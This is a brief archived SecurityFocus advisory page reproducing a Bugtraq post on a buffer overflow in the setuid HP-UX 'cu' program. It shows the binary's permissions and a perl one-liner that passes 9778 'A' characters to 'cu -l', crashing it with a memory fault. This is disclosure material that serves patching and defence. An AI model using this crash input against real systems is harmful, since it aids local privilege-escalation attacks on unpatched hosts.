HP-UX cu Buffer Overflow Vulnerability

Example from zorgon's <zorgon@linuxstart.com> Bugtraq post:

$ ls -la `which cu`
-r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu

Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a chou : Requested device/system name not known

$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault


 

Privacy Statement
Copyright 2010, SecurityFocus